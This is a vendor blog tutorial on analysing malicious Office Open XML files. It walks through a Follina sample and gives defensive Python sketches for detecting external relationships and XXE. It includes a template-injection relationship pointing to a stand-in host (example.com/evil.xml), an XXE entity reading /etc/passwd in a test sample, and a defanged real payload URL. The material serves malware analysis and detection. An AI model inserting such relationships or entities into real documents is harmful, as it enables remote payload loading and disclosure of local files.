    The Beginner’s Guide To – OOXML Malware Reverse Engineering Part 1

    By BUFFERZONE Team, 24/08/2023

    Target: Cybersecurity specialist

    Tags: OOXML, Word, PowerPoint, Excel, Malware, Content Disarm and Reconstruction (CDR), Reverse Engineering, Zero-Trust.

    Microsoft Office Open XML (OOXML) has been the default format for Office documents since Office 2007. OOXML is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations, and word-processing documents. It is used by files with the extensions xlsx, docx, pptx, and other variants [2]. It is the successor to the Object Linking and Embedding (OLE) file format, which stores content in compound files instead of XML files. Office can open both formats and save a document from one format to the other. Ecma International standardized the initial version as ECMA-376; ISO and IEC standardized later versions as ISO/IEC 29500 [1].

    Hackers exploit Microsoft OOXML for several reasons:

    • It is widely used by Microsoft Office, the most popular office suite in the world, and OOXML is the default file format for Microsoft Office 2007 and later versions (including Office 365). This means that many people use OOXML files, making them a target for hackers.
    • OOXML is a complex file format, which makes it difficult to secure. There are many diverse ways to exploit OOXML files, and it can be difficult for security researchers to keep up with all the new vulnerabilities discovered. Known vulnerabilities are modified and used in the wild for a long time.
    • OOXML is an open standard that is freely available to anyone. This makes it easier for hackers to find and exploit vulnerabilities in OOXML files.

    OOXML File-Format

    An OOXML file is a ZIP archive containing XML files organized into a package. The content type of each part is declared in a manifest file called [Content_Types].xml, which applications rely on to read and write OOXML files.

    The manifest maps every part in the package, by file extension or by part name, to its content type. The relationships between the parts are stored separately in .rels files.
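
    To make the role of [Content_Types].xml concrete, here is a minimal sketch that reads the manifest from a package using only the Python standard library. The helper names and the tiny in-memory sample package are our own assumptions for illustration; as with any tooling in this post, run it only inside the isolated analysis machine.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"


def read_content_types(package):
    """Return (defaults, overrides) parsed from [Content_Types].xml.

    `package` is a path or a file-like object holding the OOXML ZIP.
    """
    with zipfile.ZipFile(package) as zf:
        root = ET.fromstring(zf.read("[Content_Types].xml"))
    # <Default> maps a file extension to a content type.
    defaults = {el.get("Extension"): el.get("ContentType")
                for el in root.iter(CT_NS + "Default")}
    # <Override> maps one specific part name to a content type.
    overrides = {el.get("PartName"): el.get("ContentType")
                 for el in root.iter(CT_NS + "Override")}
    return defaults, overrides


def build_sample_package():
    """Build a tiny, hypothetical package in memory for demonstration."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" '
        'ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" '
        'ContentType="application/vnd.openxmlformats-officedocument.'
        'wordprocessingml.document.main+xml"/>'
        '</Types>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<document/>")
    buf.seek(0)
    return buf


defaults, overrides = read_content_types(build_sample_package())
for part_name, content_type in overrides.items():
    print(part_name, "->", content_type)
```

    For a real sample, pass the path of the file instead of the in-memory buffer.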

    • Rels: A .rels part in an OOXML file is a manifest that lists the relationships between the parts of the package. Each relationship has an Id, a Type, and a Target; the source is the part (or the package root) that owns the .rels file. The .rels parts are located in the _rels folders of the package.
    <?xml version="1.0" encoding="utf-8" standalone="yes"?>
    <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
      <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml" />
      <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml" />
      <Relationship Id="rId3"
    • The first relationship (rId1) has the type officeDocument and points from the package root to the main document part, word/document.xml.
    • The second relationship (rId2) has the type extended-properties and points to docProps/app.xml.
    • The third relationship (rId3) is cut off in the listing above, so its type and target are not shown.

    The .rels section is a critical part of the OOXML file format. It allows applications to read and write OOXML files by providing information about the relationships between the parts of the file.
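
    The structure of a .rels part can be read with a few lines of Python. The following is a minimal sketch, assuming the relationships XML has already been extracted from the package; the function name and the sample bytes are ours and only mirror the two complete relationships shown above.

```python
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Hypothetical sample mirroring the root .rels listing in this post.
SAMPLE_RELS = b"""<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument"
    Target="word/document.xml" />
  <Relationship Id="rId2"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties"
    Target="docProps/app.xml" />
</Relationships>"""


def parse_relationships(rels_xml):
    """Return one dict per <Relationship> element in a .rels part."""
    root = ET.fromstring(rels_xml)
    return [
        {
            "id": rel.get("Id"),
            # Keep only the last path segment of the type URI for readability.
            "type": rel.get("Type", "").rsplit("/", 1)[-1],
            "target": rel.get("Target"),
            # TargetMode is optional and defaults to Internal.
            "mode": rel.get("TargetMode", "Internal"),
        }
        for rel in root.iter(REL_NS + "Relationship")
    ]


for rel in parse_relationships(SAMPLE_RELS):
    print(rel["id"], rel["type"], rel["target"], rel["mode"])
```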

    • docProps: The docProps section in an OOXML file is a container for document properties. Document properties are metadata about the document, such as the author, the title, the creation date, and the modification date.

    The docProps section is located in the docProps folder of the OOXML package. The folder is not visible to the user in Office; it appears only once the package is unzipped, and it holds the property parts core.xml and app.xml.

    The core.xml and app.xml parts found in docProps include information such as:

    • Author: The name of the author of the document.
    • Title: The title of the document.
    • Subject: The subject of the document.
    • Keywords: A list of keywords that describe the document.
    • Creation date: The date and time that the document was created.
    • Last modification date: The date and time that the document was last modified.
    • Company: The name of the company that created the document.
    • Manager: The name of the manager who approved the document.
    • Comments: Any comments about the document.
    • Template: The name of the template that was used to create the document.
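
    As an illustration of how this metadata can be collected during triage, the sketch below reads a handful of fields from docProps/core.xml. The field selection, function name, and sample values are assumptions made for this example; properties such as Company, Manager, and Template live in docProps/app.xml and are not covered here.

```python
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}

# Friendly name -> element name inside core.xml.
FIELDS = {
    "author": "dc:creator",
    "title": "dc:title",
    "subject": "dc:subject",
    "keywords": "cp:keywords",
    "comments": "dc:description",
    "created": "dcterms:created",
    "modified": "dcterms:modified",
}

# Hypothetical core.xml content used only for demonstration.
SAMPLE_CORE = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties
    xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:dcterms="http://purl.org/dc/terms/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <dc:title>Quarterly report</dc:title>
  <dc:creator>Example Author</dc:creator>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-24T10:00:00Z</dcterms:created>
</cp:coreProperties>"""


def read_core_properties(core_xml):
    """Return the core properties that are present and non-empty."""
    root = ET.fromstring(core_xml)
    props = {}
    for name, tag in FIELDS.items():
        element = root.find(tag, NS)
        if element is not None and element.text:
            props[name] = element.text
    return props


print(read_core_properties(SAMPLE_CORE))
```

    Metadata is set by whoever built the file, so treat these values as hints for correlation and not as proof of origin.
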

    • CustomXML: The CustomXML section in an OOXML file is a container for custom XML parts. Custom XML parts are XML documents that can be stored in an OOXML file. They can be used to store arbitrary data, such as custom properties, user-defined tags, or even entire documents.

    The CustomXML contains:

    • The CustomXML Part element specifies the ID, name, and content of the custom XML part.
    • The Id attribute specifies the unique identifier of the custom XML part.
    • The Name attribute specifies the name of the custom XML part.
    • The content element specifies the content of the custom XML part.

    The CustomXML can store:

    • Custom properties: Custom properties can be used to store arbitrary data about a document.
    • User-defined tags: User-defined tags can be used to add custom formatting to a document.
    • Entire documents: Entire documents can be stored in a CustomXML section, which makes it possible to store templates or other documents that are referenced by the main document.

    • Word: The word section in an OOXML file stores the main content of the document: the text, formatting, and other elements that make it up. It is located in the word folder, a subfolder of the package root. The word section is a critical part of the OOXML file format because it holds the content that makes the document readable.

    The Word section contains:

    • Text: The t element (w:t) stores the actual text of the document.
    • Formatting: The rPr element stores the formatting of a run of text, such as the font, size, and color; the pPr element stores paragraph-level formatting.
    • Styles: The pStyle element, located inside pPr, names the style applied to the paragraph.
    • Objects: Objects like images and tables can also be stored in a word section.
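
    To show how these elements fit together, here is a small sketch that pulls the visible text out of word/document.xml by walking the paragraph (w:p) and text (w:t) elements. The function name and the sample document are assumptions for illustration, and the sketch deliberately ignores tables, text boxes, and other nested structures.

```python
import xml.etree.ElementTree as ET

W_NS = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"

# Hypothetical document.xml with two paragraphs; the first has two runs.
SAMPLE_DOCUMENT = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body>
    <w:p>
      <w:pPr><w:pStyle w:val="Heading1"/></w:pPr>
      <w:r><w:rPr><w:b/></w:rPr><w:t xml:space="preserve">Hello </w:t></w:r>
      <w:r><w:t>world</w:t></w:r>
    </w:p>
    <w:p><w:r><w:t>Second paragraph</w:t></w:r></w:p>
  </w:body>
</w:document>"""


def extract_paragraphs(document_xml):
    """Return the text of each w:p element, joining the w:t runs inside it."""
    root = ET.fromstring(document_xml)
    paragraphs = []
    for paragraph in root.iter(W_NS + "p"):
        text = "".join(t.text or "" for t in paragraph.iter(W_NS + "t"))
        paragraphs.append(text)
    return paragraphs


for line in extract_paragraphs(SAMPLE_DOCUMENT):
    print(line)
```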

    Attacking The Format

    Microsoft Office files are common attack vectors for spreading malware, with a continuous but slow increase in OOXML-based malware since 2015. There are several methods employed by malicious actors to exploit OOXML files:

    • RELS (template injection): By adding a new relationship to a .rels file, an attacker can make the document load content from a location they control [4]. For example:

    <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="http://example.com/evil.xml" TargetMode="External" />
    The target can be a remote URI or a local file.
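
    A simple way to spot this kind of injection is to walk every .rels part in the package and list the relationships whose TargetMode is External. The sketch below does that with the standard library; the function names and the in-memory sample are our own assumptions, not part of any existing tool.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_URI = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = "{%s}Relationship" % REL_URI
TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def find_external_relationships(package):
    """Return (rels_part, relationship_id, target) for each external target."""
    findings = []
    with zipfile.ZipFile(package) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_TAG):
                if rel.get("TargetMode", "").lower() == "external":
                    findings.append((name, rel.get("Id"), rel.get("Target")))
    return findings


def build_sample_package():
    """Build a hypothetical package with one injected external relationship."""
    root_rels = (
        f'<Relationships xmlns="{REL_URI}">'
        f'<Relationship Id="rId1" Type="{TYPE_BASE}officeDocument" '
        'Target="word/document.xml"/>'
        '</Relationships>'
    )
    doc_rels = (
        f'<Relationships xmlns="{REL_URI}">'
        f'<Relationship Id="rId3" Type="{TYPE_BASE}customXml" '
        'Target="http://example.com/evil.xml" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
    buf.seek(0)
    return buf


for part, rel_id, target in find_external_relationships(build_sample_package()):
    print(part, rel_id, target)
```

    Not every external relationship is malicious (ordinary hyperlinks are stored the same way), so the output is a list of leads to review and not a verdict.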

    • VBA Macros: As with OLE malware, attackers use lure images to convince users to enable macros.
    • Embedding of OLE Objects: OOXML allows OLE (Object Linking and Embedding) objects to be embedded within an OOXML file. These objects are created by programs that support Microsoft’s OLE technology, such as Microsoft Word. Malicious actors can exploit vulnerabilities in the handling of embedded OLE objects, for example to execute remote code.
    • General XML Vulnerabilities: While not specific to OOXML, XML vulnerabilities can potentially impact OOXML files since they are XML-based. An example of this is XML External Entity (XXE) attacks, where a weakly configured XML parser can be exploited to lead to various system impacts, such as the disclosure of confidential data, denial of service, server-side request forgery, and more. XXE attacks can involve external resource inclusion style attacks, which can disclose local files containing sensitive information or enable CSRF attacks on unprotected internal services [5].
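
    As a rough illustration of how XXE attempts can be surfaced during static analysis, the sketch below flags XML parts that contain a DOCTYPE or ENTITY declaration. It rests on our assumption that legitimate OOXML parts do not declare a DTD; the function names and sample are hypothetical, and a byte-level search like this will miss parts stored in encodings such as UTF-16.

```python
import io
import re
import zipfile

# Byte pattern for the start of a DTD or entity declaration.
DTD_MARKERS = re.compile(rb"<!(DOCTYPE|ENTITY)", re.IGNORECASE)


def find_dtd_declarations(package):
    """Return the names of XML parts that contain DOCTYPE/ENTITY markers."""
    hits = []
    with zipfile.ZipFile(package) as zf:
        for name in zf.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue
            if DTD_MARKERS.search(zf.read(name)):
                hits.append(name)
    return hits


def build_sample_package():
    """Build a hypothetical package where one part declares an external entity."""
    clean = '<?xml version="1.0"?><styles/>'
    suspicious = (
        '<?xml version="1.0"?>'
        '<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        '<doc>&xxe;</doc>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/styles.xml", clean)
        zf.writestr("word/document.xml", suspicious)
    buf.seek(0)
    return buf


print(find_dtd_declarations(build_sample_package()))
```

    The scan never parses the XML, so it cannot trigger entity expansion itself.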

    Malware Investigation Research Steps:

    Investigating OOXML malware requires a careful and systematic approach. Below are the steps we recommend and follow in our own research:

    1. Isolation: Always work in a safe environment when dealing with potential malware. This usually means using a sandbox or a dedicated, isolated system that is not connected to your network. In this blog, we will work inside an Ubuntu virtual machine.
    2. Collection: Next, gather potentially malicious OOXML files. These can be sourced from spam emails and suspicious websites, or shared through threat intelligence feeds. We will use MalwareBazaar [6], a public malware repository, to obtain samples for analysis.
    3. Static Analysis: Start by examining the OOXML file without executing it. This includes viewing the file metadata, the structure, and any embedded objects, scripts, or unusual elements. In this blog, we will use olevba and oleobj from the oletools suite [7], the YARA static signature engine [8], and malware signatures from the ditekshen detection YARA rule set [9].
    4. Dynamic Analysis: This involves monitoring the behavior of the OOXML file when it is opened. You would typically use a sandbox environment for this, which can safely log the actions of the file, such as network connections, file system modifications, or registry changes. Many evasive behaviors are discovered during dynamic analysis that can highlight behavior that we missed during the static analysis or are unfamiliar with. This part will be outside of this blog’s focus.
    5. Payload Extraction: If the OOXML has an embedded payload, this will need to be extracted for further analysis. This could be another file, a script, or something else. Payload extraction can be done as part of the static analysis or part of the dynamic analysis features.
    6. Code Analysis: If the OOXML includes embedded or obfuscated code, such as OLE objects or PowerShell, this must be analyzed. This involves de-obfuscating the code, understanding its functionality, and identifying any potential exploits or vulnerabilities it might use. This will be done as part of our static analysis investigation.
    7. Threat Intelligence Correlation: Correlate the information collected about the OOXML malware with threat intelligence data. This can reveal the possible threat actors, campaigns, and methods, or whether this malware has been observed before. This step starts after collection and continues during the static and dynamic analysis. When we discover Indicators of Compromise (IOCs) in the file, such as hashes of dropped files (SHA-256 or MD5), URLs, and IP addresses, we can use threat intelligence to enhance our understanding of the file’s capabilities.
    8. Reporting: Finally, document your findings. This report should detail the characteristics of the malware, how it works, its impact, and recommended mitigation strategies.
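
    The IOC collection mentioned in step 7 can be partly automated. Below is a minimal sketch that pulls URLs and IPv4 addresses out of text taken from the unzipped parts; the regular expressions and the function name are our own simplifications and will produce noise, for example the schemas.openxmlformats.org namespace URLs or dotted version numbers.

```python
import re

# Deliberately simple patterns: good enough for triage, not for validation.
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)


def extract_iocs(text):
    """Return the unique URLs and IPv4 addresses found in `text`, sorted."""
    return {
        "urls": sorted(set(URL_RE.findall(text))),
        "ipv4": sorted(set(IPV4_RE.findall(text))),
    }


# Hypothetical input using documentation-only addresses.
sample = (
    '<Relationship Target="http://203.0.113.7:8080/a.html" '
    'TargetMode="External"/> see http://example.com/x'
)
print(extract_iocs(sample))
```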

    Remember to stay safe when investigating potential malware, and only do so in a controlled and isolated environment. It is essential to keep systems and software up to date to protect against known vulnerabilities that malware often exploits. This tutorial is for educational purposes only. Please take full responsibility while handling dangerous malicious files.

    OOXML Research

    In this blog, we will investigate sha256:  812f20d2efdf9807d425cb63ea737d4bbc4774af375dbc6d3164b913c450b1be
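
    Before starting, it is worth confirming that the downloaded sample matches the hash above. The following sketch computes a SHA-256 digest in chunks; the function names are ours, and the path passed to sha256_of_file is whatever name you saved the sample under.

```python
import hashlib
import io

EXPECTED_SHA256 = "812f20d2efdf9807d425cb63ea737d4bbc4774af375dbc6d3164b913c450b1be"


def sha256_of_stream(stream, chunk_size=65536):
    """Hash a binary stream in chunks so large files are not loaded at once."""
    digest = hashlib.sha256()
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        digest.update(chunk)
    return digest.hexdigest()


def sha256_of_file(path):
    """Hash the file at `path` (hypothetical location of the sample)."""
    with open(path, "rb") as handle:
        return sha256_of_stream(handle)


def matches_expected(path, expected=EXPECTED_SHA256):
    """Return True when the file's SHA-256 equals the expected value."""
    return sha256_of_file(path) == expected.lower()


# Self-check on in-memory bytes instead of a real sample.
print(sha256_of_stream(io.BytesIO(b"abc")))
```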

    Threat Intelligence:

    The first stage is reviewing the file in VirusTotal to get its reputation and related information. We can observe that the file is related to Follina (CVE-2022-30190), a vulnerability in the Microsoft Support Diagnostic Tool (MSDT) [10]. The adversaries behind this exploit hosted the Follina exploit at an external, public-facing URL. This URL was injected into the document with an exploit marker “!” at the end of the URL to trigger the exploit template. Although the exploit is from 2022, the detection rate we observe in VirusTotal is relatively low: 40/65.
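
    Based only on the description above (an HTTP or HTTPS URL with a trailing “!”), a relationship target can be checked with a short heuristic. This is a sketch under that assumption, with a function name of our own choosing; real samples may wrap or extend the URL in ways this check does not cover.

```python
from urllib.parse import urlsplit


def has_follina_style_marker(target):
    """Return True if `target` is an HTTP(S) URL that ends with '!'."""
    url = target.strip()
    scheme = urlsplit(url).scheme.lower()
    return scheme in ("http", "https") and url.endswith("!")


# Hypothetical targets using a documentation-only address.
for candidate in (
    "http://198.51.100.5:8080/payload.html!",
    "http://example.com/template.dotx",
    "media/image1.png",
):
    print(candidate, has_follina_style_marker(candidate))
```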

    Dynamic Analysis:

    From viewing the file in an OPSWAT FileScan.IO emulation sandbox environment, we can observe that winword.exe opened iexplore.exe and downloaded: http://45[.]67[.]229[.]164:[7497]/payload.html

    This is evidence of malicious activity: the document downloads an HTML file from a raw IP address on a non-standard port instead of from a registered domain. Such behavior is abnormal for a legitimate document and typical of malware.
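
    The "raw IP address instead of a domain" observation is easy to turn into a check. The sketch below first removes the square brackets used to defang the indicator and then tests whether the host part of the URL is an IP literal. Both function names are our own, and the bracket removal is a simplification that would also strip the brackets of a genuine IPv6 URL.

```python
import ipaddress
from urllib.parse import urlsplit


def refang(indicator):
    """Remove the square brackets used to defang indicators in reports."""
    return indicator.replace("[", "").replace("]", "")


def host_is_ip_literal(url):
    """Return True when the URL's host is an IP address, not a domain name."""
    host = urlsplit(url).hostname
    if host is None:
        return False
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


observed = "http://45[.]67[.]229[.]164:[7497]/payload.html"
print(host_is_ip_literal(refang(observed)))
```

    Keep indicators defanged in reports and notes, and refang them only in memory when a tool needs the real value.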

    Now let’s review it from the static analysis point of view.

    Static Analysis:

    To begin our analysis, we will use a script called oleid, which is part of the oletools library. We can observe that oleid detected external relationships.

    It is also interesting to look at the document’s structure after unzipping: the .rels file is located inside the word folder and not at the top level of the package, which is allowed in OOXML.

    From the oleid output, we can see that there are no VBA or XLM macros. We verified this by running olevba <file>.
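
    As a quick cross-check that does not depend on any tool, we can look for a vbaProject.bin part, which is where macro-enabled OOXML files store their VBA project. The sketch below is a rough stand-in under that assumption, not a description of how olevba works, and it does not look for XLM macros; the function names and sample packages are hypothetical.

```python
import io
import zipfile


def has_vba_project(package):
    """Return True if the package contains a vbaProject.bin part."""
    with zipfile.ZipFile(package) as zf:
        return any(name.lower().endswith("vbaproject.bin")
                   for name in zf.namelist())


def make_package(part_names):
    """Build a hypothetical in-memory package containing empty parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in part_names:
            zf.writestr(name, b"")
    buf.seek(0)
    return buf


plain = make_package(["[Content_Types].xml", "word/document.xml"])
with_macros = make_package(["[Content_Types].xml", "word/vbaProject.bin"])
print(has_vba_project(plain), has_vba_project(with_macros))
```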

    By running oleobj, we can see that it detected an external relationship pointing to the IP address we saw in the dynamic analysis.

    Content Disarm and Reconstruction (CDR) technology is a great solution to counter this. CDR removes any suspicious attack vectors, whether they are malicious or not.
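
    To illustrate the general idea of disarming (and only the idea), the toy sketch below copies a package while dropping every relationship whose TargetMode is External. It is our own simplification and is not how BUFFERZONE SafeBridge or any other CDR product is implemented; the function names and sample are hypothetical, and a real solution must also repair the parts that referenced the removed relationships.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_URI = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = "{%s}Relationship" % REL_URI
TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def strip_external_relationships(src, dst):
    """Copy the package from `src` to `dst` without external relationships.

    Returns a list of (rels_part, target) pairs that were removed.
    """
    # Serialize relationships with a default namespace, as Office does.
    ET.register_namespace("", REL_URI)
    removed = []
    with zipfile.ZipFile(src) as zin, \
            zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as zout:
        for item in zin.infolist():
            data = zin.read(item.filename)
            if item.filename.endswith(".rels"):
                root = ET.fromstring(data)
                for rel in list(root):
                    is_external = rel.get("TargetMode", "").lower() == "external"
                    if rel.tag == REL_TAG and is_external:
                        removed.append((item.filename, rel.get("Target")))
                        root.remove(rel)
                data = ET.tostring(root, encoding="utf-8", xml_declaration=True)
            zout.writestr(item.filename, data)
    return removed


def build_sample_package():
    """Build a hypothetical package with one internal and one external link."""
    doc_rels = (
        f'<Relationships xmlns="{REL_URI}">'
        f'<Relationship Id="rId1" Type="{TYPE_BASE}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId3" Type="{TYPE_BASE}customXml" '
        'Target="http://example.com/evil.xml" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
    buf.seek(0)
    return buf


cleaned = io.BytesIO()
print(strip_external_relationships(build_sample_package(), cleaned))
```

    Because ordinary hyperlinks are also external relationships, this blunt approach removes them too, which matches the CDR principle of removing risky constructs whether or not they are malicious.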

    After using BUFFERZONE SafeBridge™ CDR technology, we observed that the solution safely removed the exploit. The oleid results for the processed file show that the external relationships are now secure.

    Our next blog post will continue to delve into attacks on the OOXML file format, present new attack vectors, and show how we can remediate them.

     

    References

    [1] ISO/IEC 29500-1:2016, Information technology — Document description and processing languages — Office Open XML File Formats — Part 1: Fundamentals and Markup Language Reference, https://www.iso.org/standard/71691.html

    [2] Open XML Formats and file name extensions, https://support.microsoft.com/en-us/office/open-xml-formats-and-file-name-extensions-5200d93c-3449-4380-8e11-31ef14555b18

    [3] Ionut Ilascu, New Technique Recycles Exploit Chain to Keep Antivirus Silent, https://www.bleepingcomputer.com/news/security/new-technique-recycles-exploit-chain-to-keep-antivirus-silent/

    [4] Template Injection, https://attack.mitre.org/techniques/T1221/

    [5] OWASP, XML External Entity (XXE) Processing, https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

    [6] MalwareBazaar, Public malware repository, https://bazaar.abuse.ch/

    [7] OleTools, https://github.com/decalage2/oletools

    [8] Yara, the pattern-matching Swiss knife for malware researchers, https://virustotal.github.io/yara/

    [9] Ditekshen, Yara signatures, https://github.com/ditekshen/detection

    [10] Sergiu Gatlan, Microsoft patches actively exploited Follina Windows zero-day, https://www.bleepingcomputer.com/news/security/microsoft-patches-actively-exploited-follina-